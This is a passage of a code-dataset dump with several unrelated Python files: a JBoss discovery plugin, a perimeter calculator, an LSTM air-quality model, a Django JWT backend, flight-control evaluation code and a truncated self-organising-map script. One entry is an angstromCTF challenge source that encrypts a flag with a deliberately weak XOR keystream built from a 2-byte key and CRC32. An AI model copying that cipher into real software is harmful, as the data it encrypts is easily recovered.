'org.jboss.boot.log.file':\n log_file_path = element.getValue()\n if path_util.isAbsolute(log_file_path):\n log_dir = path_util.dirName(log_file_path)\n server_dir = path_util.dirName(log_dir)\n logger.debug('Found by log-file %s' % path_util.baseName(server_dir))\n return path_util.baseName(server_dir)\n\n def parse_server_name(self, element, path_util):\n return (self.__parse_server_name_from_server_option(element) or\n self.__parse_server_name_from_log_file_path(element, path_util))\n\n def __is_java_option(self, element):\n return element.getType() == jee.CmdLineElement.Type.JAVA_OPTION\n\n def process(self, context):\n shell = context.client\n fs = file_system.createFileSystem(shell)\n path_util = file_system.getPath(fs)\n application = context.application\n osh = application.getOsh()\n process = application.getMainProcesses()[0]\n cmd_line = process.commandLine\n jvm_cmd_line_descriptor = jee.JvmCommandLineDescriptor(cmd_line)\n cmd_line_elements = jvm_cmd_line_descriptor.parseElements()\n java_options = filter(self.__is_java_option, cmd_line_elements)\n parse_fn = partiallyApply(self.parse_server_name, fptools._, path_util)\n server_name = first(keep(parse_fn, java_options))\n logger.debug('server name: %s' % server_name)\n if server_name is not None:\n osh.setAttribute('j2eeserver_servername', server_name)\n #TODO: replace to jee.ServerTopologyBuilder._composeFullName\n osh.setAttribute('j2eeserver_fullname', server_name)\n modeling.setAppServerType(osh)\n\n self.reportEndpointByConfigFile(context, application, cmd_line, fs)\n\n def reportEndpointByConfigFile(self,context, application, cmd_line, fs):\n logger.debug(\"reporting endpoints for jboss7 ManagedServer configfile\")\n endpointOSHV = ObjectStateHolderVector()\n ip = application.getConnectionIp()\n server_runtime = jboss_discoverer.createServerRuntime(cmd_line, ip)\n home_dir = server_runtime.findHomeDirPath()\n config = server_runtime.extractOptionValue('--server-config')\n layout = jboss_discoverer.DomainModeLayout(fs, home_dir, config)\n loadDtd = 0\n server_config_parser = jboss_discoverer.ServerConfigParserV7(loadDtd)\n host_ConfigPath = layout.getHostConfigPath()\n host_ConfigPath_file = layout.getFileContent(host_ConfigPath)\n host_ControllerConfigWithExpressions = server_config_parser.parseHostControllerConfig(host_ConfigPath_file.content)\n # Host-Controller System Properties propagated from Domain System Properties and can be defined at host-controller config\n host_ControllerProperties = jboss_discoverer.SystemProperties()\n # update system properties from host-controller config-file:\n host_ControllerProperties.update(host_ControllerConfigWithExpressions.getSystemProperties())\n # now we are ready to resolve host-controller config-expressions to values\n host_ControllerConfig = server_config_parser.resolveHostControllerConfig(host_ControllerConfigWithExpressions, host_ControllerProperties)\n managementBindings = host_ControllerConfig.getManagementBindings()\n for managementBinding in managementBindings:\n port = managementBinding.getPort()\n if port:\n if context.application.getApplicationIp():\n ip = context.application.getApplicationIp()\n endpoint = netutils.Endpoint(port, netutils.ProtocolType.TCP_PROTOCOL, ip)\n endpointOSH = modeling.createIpServerOSH(endpoint)\n hostosh = modeling.createHostOSH(ip)\n endpointOSH.setContainer(hostosh)\n linkOsh = modeling.createLinkOSH(\"usage\", context.application.getOsh(), endpointOSH)\n endpointOSHV.add(endpointOSH)\n endpointOSHV.add(linkOsh)\n logger.debug('Get ip using configfile domain.xml:',ip)\n logger.debug('Get port using configfile domain.xml:', port)\n if endpointOSHV:\n context.resultsVector.addAll(endpointOSHV)\n","repo_name":"chundcm/cda-record","sub_path":"reference/ucmdb/discovery/plugins_jboss_server_domain.py","file_name":"plugins_jboss_server_domain.py","file_ext":"py","file_size_in_byte":27005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5096745086","text":"#!/usr/bin/env python\nimport sys\n\n\nclass Point:\n def __init__(self, *points: int):\n self.points = points\n\n def distance(self, other):\n diff = ((a-b)**2 for a, b in zip(self.points, other.points))\n return sum(diff)**0.5\n\n def __repr__(self):\n return f'Point{self.points}'\n\n def __str__(self):\n return f'Point{self.points}'\n\n\ndef read(arg):\n points = []\n with open(arg, 'r') as data:\n for i in data:\n point = tuple(int(a) for a in i.strip().split(','))\n points.append(point)\n return points\n\n\ndef total_perim(data):\n side = []\n a = [Point(*d) for d in data]\n total = 0\n i = 0\n to_index = len(a)-1\n while i < to_index:\n perimeter = a[i].distance(a[i+1])\n side.append(perimeter)\n total += perimeter\n i += 1\n last = a[0].distance(a[-1])\n total += last\n side.append(last)\n return round(total, 2), side\n\n\ndef outcome(data):\n val = total_perim(data)\n print(f'Sides: {val[1]}'\n f'\\nTotal perimeter: {val[0]}'\n f'\\nMaximum length: {round(max(val[1]), 2)}'\n\t\t f'\\nMinimum length: {round(min(val[1]), 2)}'\n f'\\nAverage length: {round(val[0]/len(val[1]), 2)}')\n\n\nif __name__ == '__main__':\n argument = sys.argv[1:]\n dt = (read(arg) for arg in argument)\n for mover, i in enumerate(dt):\n print(\"-\"*10, argument[mover], \"*\"*10) # Displaying the name of the file\n print('Points:', i)\n outcome(i)\n print(end='\\n')\n","repo_name":"comsavvy/Perimeter","sub_path":"perimeter.py","file_name":"perimeter.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"18582745353","text":"import os\nimport subprocess as sp\n\npid = os.fork()\nif pid == 0:\n try:\n print(\"I'm child with ID:\", os.getpid())\n print(\"My parent's ID:\", os.getppid())\n p = sp.run([\"python\", \"testchild.py\"]) # Does not hang\n finally:\n os._exit(0) # Be sure to exit child process if running in interactive interpreter\nelse:\n os.waitpid(pid, 0) # This will ensure parent print statements are always last\n print(\"I'm parent with ID:\", os.getpid())\n print(\"My child's ID:\", pid)\n","repo_name":"mrclary/spyder-dev","sub_path":"issue-20629/mwe_1_works.py","file_name":"mwe_1_works.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38237897362","text":"import os\nimport zlib\ndef keystream():\n\tkey = os.urandom(2)\n\tindex = 0\n\twhile 1:\n\t\tindex+=1\n\t\tif index >= len(key):\n\t\t\tkey += zlib.crc32(key).to_bytes(4,'big')\n\t\tyield key[index]\nciphertext = []\nwith open(\"plain\",\"rb\") as f:\n\tplain = f.read()\n\tassert b\"actf{\" in plain\n\tk = keystream()\n\tfor i in plain:\n\t\tciphertext.append(i ^ next(k))\nwith open(\"enc\",\"wb\") as g:\n\tg.write(bytes(ciphertext))","repo_name":"sajjadium/ctf-archives","sub_path":"ctfs/angstrom/2021/crypto/Follow_the_Currents/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"77"} +{"seq_id":"25237686885","text":"import os\nimport pickle\nfrom time import time\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix, classification_report, \\\n ConfusionMatrixDisplay, PrecisionRecallDisplay, \\\n RocCurveDisplay, roc_auc_score\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.neural_network import MLPClassifier\n\nfrom feature_models import feature_model_A_1, feature_model_D_1\nimport parameters as p\n\ndata_directory = p.DATA_DIRECTORY\nparameter_data_directory = \\\n os.path.join(p.PARAMETER_DATA_DIRECTORY, 'Basic Multilayer Perceptron')\nperformance_data_directory = \\\n os.path.join(p.PERFORMANCE_DATA_DIRECTORY, 'Basic Multilayer Perceptron')\nclassifier_directory = \\\n os.path.join(p.CLASSIFIER_DIRECTORY, 'basic_multilayer_perceptron')\n\n\ndef main():\n # start_time = pd.Timestamp.now()\n # print(f\"Started Parameter Grid Search at {start_time}...\")\n # parameter_search(features, targets)\n # run_time = (pd.Timestamp.now() - start_time).total_seconds() / 60.0\n # print(f\"Grid Search Completed in {run_time:.2f} minutes.\\n\")\n\n # features, targets = \\\n # feature_model_A_1.get_data(data_directory)\n # start_time = pd.Timestamp.now()\n # print(f\"Started Random Forest Classification at {start_time}...\")\n # multilayer_perceptron_classification(\n # features, targets,\n # 'basic_multi_layer_perceptron_fm_A_1',\n # 'Basic Multi-Layer Perceptron Classification, Feature Model A_1'\n # )\n # run_time = (pd.Timestamp.now() - start_time).total_seconds() / 60.0\n # print(f\"Training Completed in {run_time:.2f} minutes.\\n\")\n\n features, targets = \\\n feature_model_D_1.get_data(data_directory)\n start_time = pd.Timestamp.now()\n print(f\"Started Random Forest Classification at {start_time}...\")\n multilayer_perceptron_classification(\n features, targets,\n 'basic_multi_layer_perceptron_fm_D_1',\n 'Basic Multi-Layer Perceptron Classification, Feature Model D_1'\n )\n run_time = (pd.Timestamp.now() - start_time).total_seconds() / 60.0\n print(f\"Training Completed in {run_time:.2f} minutes.\\n\")\n\n\ndef multilayer_perceptron_classification(features: np.ndarray,\n targets: np.ndarray,\n filename: str,\n filename_pretty: str):\n \"\"\"\n A basic, out of the box MLP classifier, using parameters\n optimized by a grid search algorithm.\n :param features:\n :param targets:\n :param filename:\n :param filename_pretty:\n :return:\n \"\"\"\n print(\"Loading Data...\")\n X_train, X_test, y_train, y_test = \\\n train_test_split(features, targets, test_size=20_000)\n clf = MLPClassifier(\n verbose=1, solver='adam',\n learning_rate='adaptive', max_iter=2000,\n n_iter_no_change=20, hidden_layer_sizes=(200, 200, 200)\n )\n print(\"Data loaded.\\n\")\n\n print(\"Fitting training data...\")\n clf.fit(X_train, y_train)\n print(\"Fitting complete.\\n\")\n\n \"Generating performance data...\"\n predictions = clf.predict(X_test)\n cm = confusion_matrix(y_test, predictions, labels=[1, 0])\n print(\"\\nConfusion Matrix:\")\n print(cm)\n print(\"\\nClassification Report:\")\n print(classification_report(y_test, predictions, labels=[1, 0]))\n print(\"\\nArea Under ROC Curve:\")\n print(1 - roc_auc_score(y_test, clf.predict_proba(X_test)[:, 0]))\n\n print(\"\\nSaving classifier...\")\n destination = os.path.join(\n classifier_directory, filename\n )\n with open(destination, 'wb') as file:\n pickle.dump(clf, file)\n print(f\"Classifier saved to {destination}\\n\")\n\n print(\"Generating precision recall figure...\")\n display = PrecisionRecallDisplay.from_estimator(\n clf, X_test, y_test, pos_label=1\n )\n display.plot()\n destination = os.path.join(\n performance_data_directory,\n filename_pretty + ' Precision Recall Curve.png'\n )\n display.figure_.savefig(destination)\n print(f\"Figure saved to {destination}\\n\")\n\n print(\"Generating ROC curve figure...\")\n display = RocCurveDisplay.from_estimator(\n clf, X_test, y_test, pos_label=1\n )\n display.plot()\n plt.show()\n destination = os.path.join(\n performance_data_directory,\n performance_data_directory, filename_pretty + ' ROC Curve.png'\n )\n display.figure_.savefig(destination)\n print(f\"Figure saved to {destination}\\n\")\n\n print(\"Generating confusion matrix figure...\")\n display = ConfusionMatrixDisplay(confusion_matrix=cm, display_labels=[1, 0])\n display.plot()\n plt.show()\n destination = os.path.join(\n performance_data_directory, filename_pretty + ' Confusion Matrix.png'\n )\n display.figure_.savefig(destination)\n print(f\"Figure saved to {destination}\\n\")\n\n print(\"All classifier training operations complete.\")\n\n\ndef parameter_search(features: np.ndarray,\n targets: np.ndarray,\n filename: str):\n \"\"\"\n Runs a parameter search on the basic multi-layer perceptron algorithm and\n prints and stores the results\n :param features:\n :param targets:\n :return:\n \"\"\"\n X_train, X_test, y_train, y_test = \\\n train_test_split(features, targets, test_size=20_000)\n clf = MLPClassifier(max_iter=2000, verbose=1)\n\n # Utility function to report best scores\n def report(results, n_top=None):\n if n_top == None:\n n_top = len(results)\n for i in range(1, n_top + 1):\n candidates = np.flatnonzero(results['rank_test_score'] == i)\n for candidate in candidates:\n print(\"Model with rank: {0}\".format(i))\n print(\"Mean validation score: {0:.3f} (std: {1:.3f})\"\n .format(results['mean_test_score'][candidate],\n results['std_test_score'][candidate]))\n print(\"Parameters: {0}\".format(results['params'][candidate]))\n print(\"\")\n\n param_grid = {\n 'hidden_layer_sizes': [(100,),\n (100, 100),\n (100, 100, 100),\n (200, 200, 200)],\n 'learning_rate': ['constant', 'invscaling', 'adaptive'],\n 'solver': ['sgd', 'adam']\n }\n grid_search = GridSearchCV(clf, param_grid=param_grid, verbose=1)\n start = time()\n grid_search.fit(X_train, y_train)\n print(\"GridSearchCV took %.2f seconds for %d candidate parameter settings.\"\n % (time() - start, len(grid_search.cv_results_['params'])))\n report(grid_search.cv_results_)\n\n results = pd.DataFrame(grid_search.cv_results_)\n destination = os.path.join(\n parameter_data_directory, filename\n )\n with open(destination, 'wb') as file:\n pickle.dump(results, file)\n print(\"All classifier training operations complete.\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AttackPenguin/395_SAMSHA_Project","sub_path":"classification_algorithms/basic_multilayer_perceptron/ca_basic_multilayer_perceptron.py","file_name":"ca_basic_multilayer_perceptron.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31041964440","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def addTwoNumbers(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n\n ret = ListNode(0)\n cur = ret\n carry = 0\n\n while l1 or l2 or carry:\n val = carry\n if l1:\n val += l1.val\n l1 = l1.next\n if l2:\n val += l2.val\n l2 = l2.next\n carry = val / 10\n val = val % 10\n # carry, val = divmod(val, 10)\n cur.next = ListNode(val)\n cur = cur.next\n\n return ret.next\n","repo_name":"ypliu/leetcode-python","sub_path":"src/002_add_two_numbers/002_add_two_numbers.py","file_name":"002_add_two_numbers.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12722378490","text":"import numpy as np\r\nimport os\r\nimport pandas as pd\r\nimport re\r\nimport requests\r\nimport seaborn as sns\r\nfrom bs4 import BeautifulSoup\r\nfrom keras.models import load_model, Sequential\r\nfrom keras.callbacks import EarlyStopping\r\nfrom keras.layers import Dense, LSTM\r\nfrom matplotlib import pyplot as plt\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler\r\nfrom urllib import parse\r\n\r\n\r\ndef download_data_set():\r\n \"\"\"\r\n Download the Beijing PM2.5 data set and saves it in the program folder\r\n \"\"\"\r\n # The page used to extract the PM2.5 data set\r\n url = \"https://archive.ics.uci.edu/ml/datasets/Beijing+PM2.5+Data\"\r\n # Request the main data set HTML page\r\n main_page = requests.get(url)\r\n # Verify if the request was successful\r\n if main_page.status_code != 200:\r\n raise requests.HTTPError(f\"The request returned the HTTP error code {main_page.status_code} - \"\r\n f\"{main_page.reason}.\")\r\n # Parse the HTML response using beautifulsoup library\r\n main_page_parsed = BeautifulSoup(main_page.text, \"html.parser\")\r\n # Retrieve the data set download url (
tag) that contains the text Data Folder\r\n try:\r\n download_url = main_page_parsed.find(\"a\", string=\"Data Folder\")[\"href\"]\r\n except TypeError:\r\n raise Exception(\"Site HTML changed.\")\r\n # Join the main url with the download url\r\n download_url = parse.urljoin(url, download_url)\r\n # Request the data set download HTML page\r\n download_page = requests.get(download_url)\r\n # Parse the HTML response using beautifulsoup library\r\n download_page_parsed = BeautifulSoup(download_page.text, \"html.parser\")\r\n # Retrieve the data set file name\r\n # more data sets could be downloaded using a regular expression that searches for \".csv\"\r\n try:\r\n file_name = download_page_parsed.find(\"a\", string=re.compile(\"PRSA.+.csv\"))[\"href\"]\r\n except TypeError:\r\n raise Exception(\"Site HTML changed.\")\r\n # Join download url with the file name\r\n download_link = parse.urljoin(download_url, file_name)\r\n # Request the data set csv HTML page\r\n data_set_page = requests.get(download_link)\r\n # Save the page content as a csv\r\n with open(file_name, 'w') as csv_file:\r\n csv_file.write(data_set_page.text.replace('\\r\\n', '\\n'))\r\n\r\n\r\ndef main():\r\n # region READ_DATA\r\n\r\n # Verify if the data set is already downloaded\r\n if not os.path.exists(\"PRSA_data_2010.1.1-2014.12.31.csv\"):\r\n download_data_set()\r\n\r\n # Read the data set csv as a DataFrame using pandas\r\n df = pd.read_csv(\"PRSA_data_2010.1.1-2014.12.31.csv\")\r\n\r\n # endregion READ_DATA\r\n\r\n # region EXPLORATORY_ANALYSIS\r\n\r\n # Describe the dataset\r\n print(df.describe())\r\n\r\n # Format the timestamp fields\r\n df['date'] = pd.to_datetime(df[['year', 'month', 'day', 'hour']])\r\n\r\n # Set the DataFrame index\r\n df.set_index('date', inplace=True)\r\n\r\n # Remove the Row Number because it's only an identifier and the timestamp\r\n df.drop(columns=['No', 'year', 'month', 'day', 'hour'], inplace=True)\r\n\r\n # The first 24 instances got an error in the reading (NaN for the PM2.5)\r\n # Since removing them will not highly affect the other instances it will be disregarded\r\n df = df[24:]\r\n\r\n # To maintain the correct order for each reading, when NaN is found it is replaced with the mean\r\n df['pm2.5'].fillna(df['pm2.5'].mean(), inplace=True)\r\n\r\n # Perform a uni-variate analysis\r\n # For each column\r\n for column in df.columns:\r\n # If is the polynomic variable\r\n if column == \"cbwd\":\r\n # Plot a bar graph\r\n plt.figure()\r\n sns.countplot(x=df[column], order=df[column].value_counts().index)\r\n plt.show()\r\n else:\r\n # Plot the histogram\r\n plt.figure()\r\n sns.histplot(x=df[column], kde=True)\r\n plt.show()\r\n\r\n # Perform the box plot\r\n plt.figure()\r\n sns.boxplot(x=df[column])\r\n plt.show()\r\n\r\n # Perform a bi-variate analysis\r\n # Correlation\r\n plt.figure()\r\n corr = df.corr()\r\n sns.heatmap(corr, xticklabels=corr.columns.values, yticklabels=corr.columns.values, annot=True)\r\n plt.show()\r\n\r\n # Pair plot\r\n sns.pairplot(df.fillna(0), diag_kind='kde')\r\n plt.show()\r\n\r\n # endregion EXPLORATORY_ANALYSIS\r\n\r\n # region REGRESSION\r\n\r\n # Encode the cbwd column to be numeric\r\n le = LabelEncoder().fit(df['cbwd'])\r\n df['cbwd'] = le.transform(df['cbwd'])\r\n\r\n # Scale all values using the min max scaler\r\n min_max_scaler = MinMaxScaler()\r\n scaled_data = min_max_scaler.fit_transform(df.values)\r\n\r\n # Split into the input and output\r\n x = scaled_data[0:-1, :]\r\n y = scaled_data[1:, 0]\r\n\r\n # Split the data in train and test\r\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.4, shuffle=False)\r\n\r\n # Reshape\r\n x_train = x_train.reshape(x_train.shape[0], 1, x_train.shape[1])\r\n x_test = x_test.reshape(x_test.shape[0], 1, x_test.shape[1])\r\n\r\n # Try to load the model, in case of an error, create, train, and save the model\r\n try:\r\n model = load_model('regression_model')\r\n except (OSError, IOError, ImportError):\r\n # Create the LSTM model\r\n model = Sequential()\r\n model.add(LSTM(50, input_shape=(x_train.shape[1], x_train.shape[2]), dropout=0.2))\r\n model.add(Dense(1))\r\n model.compile(loss='mae', optimizer='adam')\r\n\r\n # Train the model\r\n early_stop = EarlyStopping(patience=10)\r\n error_history = model.fit(x_train, y_train, validation_data=(x_test, y_test), epochs=100, verbose=2,\r\n callbacks=[early_stop], shuffle=False)\r\n\r\n # Plot the training error\r\n plt.plot(error_history.history['loss'], label='train')\r\n plt.plot(error_history.history['val_loss'], label='test')\r\n plt.legend()\r\n plt.show()\r\n\r\n model.save(\"regression_model\")\r\n\r\n # Use the trained model to predict\r\n predictions = model.predict(x_test)\r\n\r\n # Reshape the true input to its original shape\r\n x_test_re = x_test.reshape(x_test.shape[0], x_test.shape[2])\r\n\r\n # Concatenate the predictions with the input\r\n predictions = np.concatenate((predictions, x_test_re[:, 1:]), axis=1)\r\n\r\n # Scale the predictions to the original range\r\n predictions = min_max_scaler.inverse_transform(predictions)\r\n\r\n # Reshape the true output\r\n y_test = y_test.reshape(y_test.shape[0], 1)\r\n\r\n # Concatenate the true output with the input\r\n y_test = np.concatenate((y_test, x_test_re[:, 1:]), axis=1)\r\n\r\n # Scale the true output to the original range\r\n y_test = min_max_scaler.inverse_transform(y_test)\r\n\r\n # Print the root of the mean squared error\r\n print(np.sqrt(mean_squared_error(y_test[:, 0], predictions[:, 0])))\r\n\r\n # endregion REGRESSION\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"reylle/myVolvoPracticalTest","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20159370495","text":"import jwt\nfrom django.conf import settings\nfrom rest_framework import authentication, exceptions\n# jwt exceptions\nfrom jwt import exceptions as jwtexceptions\nfrom .models import User\n\n\nclass JWTAuthentication(authentication.BaseAuthentication):\n authentication_header_prefix = 'Bearer'\n\n def authenticate(self, request):\n \"\"\"\n 1) `None` - We return `None` if we do not wish to authenticate. Usually\n this means we know authentication will fail.\n\n 2) `(user, token)` - We return a user/token combination when\n authentication is successful.\n\n If neither case is met - raise the `AuthenticationFailed`\n \"\"\"\n request.user = None\n\n # `auth_header` should be an array with two elements: 1) the name of\n # the authentication header (in this case, \"Token\") and 2) the JWT\n # that we should authenticate against.\n auth_header = authentication.get_authorization_header(request).split()\n auth_header_prefix = self.authentication_header_prefix.lower()\n\n if not auth_header:\n return None\n\n if len(auth_header) == 1:\n # Invalid token header. No credentials provided. Do not attempt to\n # authenticate.\n return None\n\n elif len(auth_header) > 2:\n # Invalid token header. The Token string should not contain spaces.\n # Do not attempt to authenticate.\n return None\n\n # get an error if we didn't decode these values.\n prefix = auth_header[0].decode('utf-8')\n token = auth_header[1].decode('utf-8')\n\n if prefix.lower() != auth_header_prefix:\n # The auth header prefix is not what we expected. Do not attempt to authenticate.\n return None\n\n # Pass credentials authentication to the method below.\n return self._authenticate_credentials(request, token)\n\n def _authenticate_credentials(self, request, token):\n \"\"\"\n Try to authenticate the given credentials. If authentication is\n successful, return the user and token. If not, throw an error.\n \"\"\"\n try:\n payload = jwt.decode(token, settings.SECRET_KEY, algorithms=['HS256'])\n except exceptions.AuthenticationFailed:\n msg = 'Authentication Failed. Could not decode token.'\n raise exceptions.AuthenticationFailed(msg)\n except jwtexceptions.InvalidSignatureError:\n msg = 'Invalid signature'\n raise jwtexceptions.InvalidSignatureError(msg)\n except jwtexceptions.DecodeError as e:\n msg = 'JWT token decode error'\n raise jwtexceptions.DecodeError(msg, e)\n try:\n user = User.objects.get(pk=payload['id'])\n except User.DoesNotExist:\n msg = 'No user matching this token was found.'\n raise exceptions.AuthenticationFailed(msg)\n\n if not user.is_active:\n msg = 'This user has been deactivated.'\n raise exceptions.AuthenticationFailed(msg)\n\n return user, token\n","repo_name":"injirez/likeapprestapi","sub_path":"authentication/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17141462187","text":"import json\nimport os\nimport random\nimport sys\nimport copy\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom tensorflow.python.ops.numpy_ops import np_config\n\nfrom envs.citation import Citation\nfrom tasks import TrackAttitudeLong, TrackAttitude\nfrom tasks.tracking_attitude_lat import TrackAttitudeLat\nfrom tools import set_plot_styles\nfrom agents import SAC, IDHPSAC_DC\nfrom tools import create_dir, plot_weights_idhp, plot_incremental_model\nfrom tools.plotting import plot_weights_and_model\nfrom tools.utils import create_dir_time, d2r, nMAE, set_random_seed\n\n# Config\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\nos.environ[\"TF_CPP_MIN_VLOG_LEVEL\"] = \"3\"\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\nnp_config.enable_numpy_behavior()\nset_plot_styles()\n\n\ndef main():\n # Evaluate trained agent\n evaluate(\"trained/IDHPSAC_DC_citation_tracking_attitude_1659358080\")\n\n input()\n\n\ndef evaluate(save_dir):\n \"\"\"\n Evaluate\n \"\"\"\n\n # Config\n config_agent_f = open(os.path.join(save_dir, \"config.json\"), \"r\")\n config_env_f = open(os.path.join(save_dir, \"config_env.json\"), \"r\")\n config_task_f = open(os.path.join(save_dir, \"config_task.json\"), \"r\")\n config_agent = json.load(config_agent_f)\n config_env = json.load(config_env_f)\n config_task = json.load(config_task_f)\n\n # Randomize\n seed = config_agent[\"seed\"]\n config_env[\"seed\"] = seed\n set_random_seed(seed)\n\n # Task\n task = TrackAttitude(config_task, evaluate_hard=True)\n\n # Environment\n config_env[\"failure\"] = \"ht_reduce\"\n config_env[\"failure_time\"] = 30\n env = Citation(config_env, dt=0.01)\n env_sac = Citation(config_env, dt=0.01)\n\n # Load agent\n config_agent[\"actor\"][\"lr_high\"] = 0.02\n config_agent[\"critic\"][\"lr_high\"] = 0.1\n agent_sac = SAC.load(\"trained/SAC_citation_tracking_attitude_1659223622/496000\", task, env_sac)\n agent: IDHPSAC_DC = IDHPSAC_DC.load(save_dir, task, env, agent_sac, config=config_agent)\n\n # Evaluate\n agent.learn()\n\n # Evaluate SAC-only\n agent_sac.evaluate()\n\n # Metrics\n nmae = nMAE(agent, env)\n nmae_sac = nMAE(agent_sac, env_sac)\n print(f\"nMAE Hybrid: {nmae * 100 :.2f}%\")\n print(f\"nMAE SAC: {nmae_sac * 100 :.2f}%\")\n\n # Plot response\n env.render(task, env_sac=env_sac)\n\n # Plot weights\n plot_weights_and_model(agent.agent_lon, agent.task_lon)\n plot_weights_and_model(agent.agent_lat, agent.task_lat)\n\n\ndef evaluate_lon(save_dir):\n \"\"\"\n Evaluate\n \"\"\"\n\n # Config\n config_agent_f = open(os.path.join(save_dir, \"config.json\"), \"r\")\n config_env_f = open(os.path.join(save_dir, \"config_env.json\"), \"r\")\n config_task_f = open(os.path.join(save_dir, \"config_task.json\"), \"r\")\n config_agent = json.load(config_agent_f)\n config_env = json.load(config_env_f)\n config_task = json.load(config_task_f)\n\n # Randomize\n seed = config_agent[\"seed\"]\n config_env[\"seed\"] = seed\n set_random_seed(seed)\n\n # Task\n # config_task[\"\"] =\n task = TrackAttitudeLong(config_task, evaluate=True)\n\n # Environment\n # config_env[\"failure\"] = \"de_reduce\"\n # config_env[\"failure_time\"] = 10\n env = Citation(config_env, dt=0.01)\n\n # Load agent\n config_agent[\"actor\"][\"lr_high\"] = 10\n config_agent[\"critic\"][\"lr_high\"] = 2\n agent_sac = SAC.load_npz(\"trained/SAC_citation_tracking_attitude_GT0PLE\", task, env) # TODO in save\n agent: IDHPSAC_DC = IDHPSAC_DC.load(save_dir, task, env, agent_sac, lon_only=True, config=config_agent)\n\n # Evaluate\n agent.learn()\n\n # Metrics\n nmae = nMAE(agent, env)\n print(f\"nMAE: {nmae * 100 :.2f}%\")\n\n # Plot response\n env.render(task, show_rmse=False, lr_warmup=config_agent[\"lr_warmup\"])\n\n # Plot weights\n plot_weights_and_model(agent.agent_lon, agent.task_lon)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CasperTeirlinck/RLFC-SACIDHP","sub_path":"scripts/evaluate_idhpsac_inner_dc.py","file_name":"evaluate_idhpsac_inner_dc.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"42405667692","text":"import inline as inline\nimport matplotlib\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport seaborn as sns # data visualization library\nimport matplotlib.pyplot as plt\nfrom minisom import MiniSom\nimport math\n\n# import warnings library\nimport warnings\n\n# ignore all warnings\nfrom som_implementationV2 import MySom\n\nwarnings.filterwarnings('ignore')\n\n############## Data Content ###################\n# ID number\n# Diagnosis (M = malignant, B = benign)\n# radius (mean of distances from center to points on the perimeter)\n# texture (standard deviation of gray-scale values)\n# perimeter\n# area\n# smoothness (local variation in radius lengths)\n# compactness (perimeter^2 / area - 1.0)\n# concavity (severity of concave portions of the contour)\n# concave points (number of concave portions of the contour)\n# symmetry\n# fractal dimension (\"coastline approximation\" - 1)\n# The mean, standard error and \"worst\" or largest (mean of the three largest values) of these features were computed for each image, resulting in 30 features. For instance, field 3 is Mean Radius, field 13 is Radius SE, field 23 is Worst Radius.\n# All feature values are recoded with four significant digits.\n# Missing attribute values: none\n# Class distribution: 357 benign, 212 malignant\n\n#print(np.sqrt(np.square(np.array([4, 5, 6]) - np.array([1, 2, 3]))).sum(axis=0))\n\n### Read and Analyse Data\nsamples = pd.read_csv('./breast_cancer_data.csv') # returns data frame\n\n# Before making anything like feature selection,feature extraction and classification, firstly we start with basic data analysis. Lets look at features of data.\n#print(samples.head()) # head method show only first 5 rows\n\n# feature names as a list\ncol = samples.columns # .columns gives columns names in data\n#print(col)\n\n# Remember:\n# 1) There is an id that cannot be used for classification\n# 2) Diagnosis is our class label\n\ny = samples.diagnosis\n\nB, M = y.value_counts()\n#print('Number of Benign: ', B)\n#print('Number of Malignant : ', M)\n\nlist = ['id', 'diagnosis']\nx = samples.drop(list, axis=1)\n\n#print(x)\n\n### transform to numpy matrix\ndata = x.to_numpy()\n\n### compute size of map\nsize = int(math.sqrt(int(5 * math.sqrt(data.shape[0]))))\n\n###compute number of features\nnumber_features = data.shape[1]\n\n#print(size)\n#print(number_features)\n#print(data)\n\nprint(data.shape)\nsom = MySom(size, size, number_features, sigma=2.0, learning_rate=0.5)\nsom.pca_init(data)\nsom.train(data, 1000)\n\n\nprint(size)\n\nplt.figure(figsize=(size, size))\nplt.pcolor(som.distance_map().T)\n\n#print(som.distance_map().T)\n\n\ntarget = samples['diagnosis'].values\n#print target\n\nt = np.zeros(len(target), dtype=int)\n\nt[target == 'M'] = 0\nt[target == 'B'] = 1\n\nprint(t)\n\n#print(t)\n\nlabels = samples['diagnosis']\nc = labels.astype('category')\nlabels = c.cat.codes\n\n\nmarkers = ['o', 's']\ncolors = ['r', 'g']\nfor cnt, xx in enumerate(data):\n w = 